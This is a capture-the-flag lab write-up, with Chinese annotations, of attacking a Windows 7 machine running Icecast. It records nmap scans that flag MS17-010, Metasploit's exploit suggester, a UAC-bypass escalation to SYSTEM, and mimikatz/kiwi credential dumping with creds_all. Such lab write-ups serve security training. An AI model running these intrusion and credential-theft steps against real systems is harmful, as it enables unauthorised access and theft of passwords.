nmap --min-rate=10000 -p- ice.thm Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 11:57 UTC Warning: 10.10.109.255 giving up on port because retransmission cap hit (10). Nmap scan report for ice.thm (10.10.109.255) Host is up (0.017s latency). Not shown: 63585 closed tcp ports (reset), 1938 filtered tcp ports (no-response) PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 5357/tcp open wsdapi 8000/tcp open http-alt 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49158/tcp open unknown 49159/tcp open unknown 49160/tcp open unknown MAC Address: 02:F8:44:2A:6E:35 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 20.11 seconds
添加hosts
nmap -sC -sT -sV -O -p135,139,445,3389,5357,8000 ice.thm Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 11:58 UTC Nmap scan report for ice.thm (10.10.109.255) Host is up (0.0060s latency).
PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 3389/tcp open ssl/ms-wbt-server? | rdp-ntlm-info: | Target_Name: DARK-PC | NetBIOS_Domain_Name: DARK-PC | NetBIOS_Computer_Name: DARK-PC | DNS_Domain_Name: Dark-PC | DNS_Computer_Name: Dark-PC | Product_Version: 6.1.7601 |_ System_Time: 2024-04-02T11:59:39+00:00 |_ssl-date: 2024-04-02T11:59:45+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=Dark-PC | Not valid before: 2024-04-01T11:47:40 |_Not valid after: 2024-10-01T11:47:40 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Service Unavailable 8000/tcp open http Icecast streaming media server |_http-title: Site doesn't have a title (text/html). MAC Address: 02:F8:44:2A:6E:35 (Unknown) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 8.1 (96%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: mean: 59m59s, deviation: 2h14m10s, median: -1s | smb2-security-mode: | 210: |_ Message signing enabled but not required |_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02f8442a6e35 (unknown) | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: Dark-PC | NetBIOS computer name: DARK-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2024-04-02T06:59:39-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2024-04-02T11:59:39 |_ start_date: 2024-04-02T11:47:38
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 90.37 seconds
nmap --script=vuln -p135,139,445,3389,5357,8000 ice.thm Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 12:00 UTC Nmap scan report for ice.thm (10.10.109.255) Host is up (0.00037s latency).
PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 5357/tcp open wsdapi 8000/tcp open http-alt |_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug) | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 MAC Address: 02:F8:44:2A:6E:35 (Unknown)
Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 |_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED |_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR |_smb-vuln-ms10-054: false
Nmap done: 1 IP address (1 host up) scanned in 101.69 seconds
meterpreter > sysinfo Computer : DARK-PC OS : Windows 7 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows
利用msf来搜寻提权的可能性
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.10.109.255 - Collecting local exploits for x86/windows... [*] 10.10.109.255 - 193 exploit checks are being tried... [+] 10.10.109.255 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 10.10.109.255 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected! [+] 10.10.109.255 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated. [+] 10.10.109.255 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. [+] 10.10.109.255 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. [+] 10.10.109.255 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.109.255 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.109.255 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable. [+] 10.10.109.255 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [+] 10.10.109.255 - exploit/windows/local/tokenmagic: The target appears to be vulnerable. [*] Running check method for exploit 41 / 41 [*] 10.10.109.255 - Valid modules for session 2: ============================
# Name Potentially Vulnerable? Check Result - ---- ----------------------- ------------ 1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable. 2 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected! 3 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated. 4 exploit/windows/local/ms13_053_schlamperei Yes The target appears to be vulnerable. 5 exploit/windows/local/ms13_081_track_popup_menu Yes The target appears to be vulnerable. 6 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable. 7 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable. 8 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable. 9 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable. 10 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
这个房间让我们用exploit/windows/local/bypassuac_eventvw
设置会话之后再次运行,查看拥有的权限
meterpreter > getprivs
Enabled Process Privileges ==========================
meterpreter > migrate -N spoolsv.exe [*] Migrating from 4008 to 4060... [*] Migration completed successfully.
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
利用kiwi(可以看作是mimikatz的更强版本)来进行密码转存,加载
meterpreter > load kiwi Loading extension kiwi... .#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success. meterpreter > help
Core Commands =============
Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel detach Detach the meterpreter session (for http/https) disable_unic Disables encoding of unicode strings ode_encoding enable_unico Enables encoding of unicode strings de_encoding exit Terminate the meterpreter session get_timeouts Get the current session timeout values guid Get the session GUID help Help menu info Displays information about a Post module irb Open an interactive Ruby shell on the current session load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session migrate Migrate the server to another process pivot Manage pivot listeners pry Open the Pry debugger on the current session quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module secure (Re)Negotiate TLV packet encryption on the session sessions Quickly switch to another session set_timeouts Set the current session timeout values sleep Force Meterpreter to go quiet, then re-establish session ssl_verify Modify the SSL certificate verification setting transport Manage the transport mechanisms use Deprecated alias for "load" uuid Get the UUID for the current session write Writes data to a channel
Stdapi: File system Commands ============================
Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory checksum Retrieve the checksum of a file cp Copy source to destination del Delete the specified file dir List files (alias for ls) download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcat Read the contents of a local file to the screen lcd Change local working directory lls List local files lmkdir Create new directory on local machine lpwd Print local working directory ls List files mkdir Make directory mv Move source to destination pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files show_mount List all mount points/logical drives upload Upload a file or directory
Command Description ------- ----------- arp Display the host ARP cache getproxy Display the current proxy configuration ifconfig Display interfaces ipconfig Display interfaces netstat Display the network connections portfwd Forward a local port to a remote service resolve Resolve a set of host names on the target route View and modify the routing table
Stdapi: System Commands =======================
Command Description ------- ----------- clearev Clear the event log drop_token Relinquishes any active impersonation token. execute Execute a command getenv Get one or more environment variable values getpid Get the current process identifier getprivs Attempt to enable all privileges available to the current process getsid Get the SID of the user that the server is running as getuid Get the user that the server is running as kill Terminate a process localtime Displays the target system local date and time pgrep Filter processes by name pkill Terminate processes by name ps List running processes reboot Reboots the remote computer reg Modify and interact with the remote registry rev2self Calls RevertToSelf() on the remote machine shell Drop into a system command shell shutdown Shuts down the remote computer steal_token Attempts to steal an impersonation token from the target process suspend Suspends or resumes a list of processes sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands ===============================
Command Description ------- ----------- enumdesktops List all accessible desktops and window stations getdesktop Get the current meterpreter desktop idletime Returns the number of seconds the remote user has been idle keyboard_sen Send keystrokes d keyevent Send key events keyscan_dump Dump the keystroke buffer keyscan_star Start capturing keystrokes t keyscan_stop Stop capturing keystrokes mouse Send mouse events screenshare Watch the remote user desktop in real time screenshot Grab a screenshot of the interactive desktop setdesktop Change the meterpreters current desktop uictl Control some of the user interface components
Stdapi: Webcam Commands =======================
Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_chat Start a video chat webcam_list List webcams webcam_snap Take a snapshot from the specified webcam webcam_strea Play a video stream from the specified webcam m
Command Description ------- ----------- creds_all Retrieve all credentials (parsed) creds_kerber Retrieve Kerberos creds (parsed) os creds_livess Retrieve Live SSP creds p creds_msv Retrieve LM/NTLM creds (parsed) creds_ssp Retrieve SSP creds creds_tspkg Retrieve TsPkg creds (parsed) creds_wdiges Retrieve WDigest creds (parsed) t dcsync Retrieve user account information via DCSync (unparsed) dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync golden_ticke Create a golden kerberos ticket t_create kerberos_tic List all kerberos tickets (unparsed) ket_list kerberos_tic Purge any in-use kerberos tickets ket_purge kerberos_tic Use a kerberos ticket ket_use kiwi_cmd Execute an arbitrary mimikatz command (unparsed) lsa_dump_sam Dump LSA SAM (unparsed) lsa_dump_sec Dump LSA secrets (unparsed) rets password_cha Change the password/hash of a user nge wifi_list List wifi profiles/creds for the current user wifi_list_sh List shared wifi profiles/creds (requires SYSTEM) ared
creds_all指令允许检索所有凭据
meterpreter > creds_all [+] Running as SYSTEM [*] Retrieving all credentials msv credentials ===============
